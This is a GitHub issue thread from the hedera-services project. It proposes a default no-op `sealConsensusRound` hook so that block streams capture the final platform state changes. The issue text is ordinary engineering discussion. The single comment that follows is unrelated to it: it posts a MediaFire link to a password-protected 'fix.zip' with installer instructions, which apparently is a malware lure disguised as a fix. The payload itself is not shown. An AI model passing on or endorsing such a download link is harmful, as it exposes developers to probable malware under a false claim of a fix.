### ISSUE TITLE
Add default no-op `SwirldState#sealConsensusRound(Round)` 

### ISSUE THREAD

**Issue by tinker-michaelj** [hashgraph/hedera-services#15139]
### Problem

After calling `SwirldState#handleConsensusRound()` [here](https://github.com/hashgraph/hedera-services/blob/stream-manager-spike/platform-sdk/swirlds-platform-core/src/main/java/com/swirlds/platform/eventhandling/DefaultTransactionHandler.java#L201), the `DefaultTransactionHandler` makes up to two more changes to state owned by `PlatformStateService`:
  1. The event running hash; and,
  2. The last frozen time.

On the preview block streams branch, this means that the `BlockStreamManager#endBlock(Bytes)` method [here](https://github.com/hashgraph/hedera-services/blob/15073-multiple-blocks/hedera-node/hedera-app/src/main/java/com/hedera/node/app/blocks/impl/BlockStreamManagerImpl.java#L254) is called slightly too early---this line,
```
        // Flush the boundary state changes as our final hashable block item
        pendingItems.add(boundaryStateChangeListener.flushChanges());
```
will miss the final changes to the `PlatformState` singleton.

We currently still get our `StateChangesValidator` to pass with a hack not worth explaining; but the better approach is ofc to give the application a chance to end its block with all changes made to state.

### Solution

- [ ] Add a `SwirldState#sealConsensusRound(Round)` method with a default no-op implementation.
- [ ] Update `DefaultTransactionHandler` to call this method after it has made all platform state changes.
- [ ] Implement `sealConsensusRound()` in `MerkleStateRoot` via a new lifecycle method that delegates to `BlockStreamManager#endBlock()`.

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."
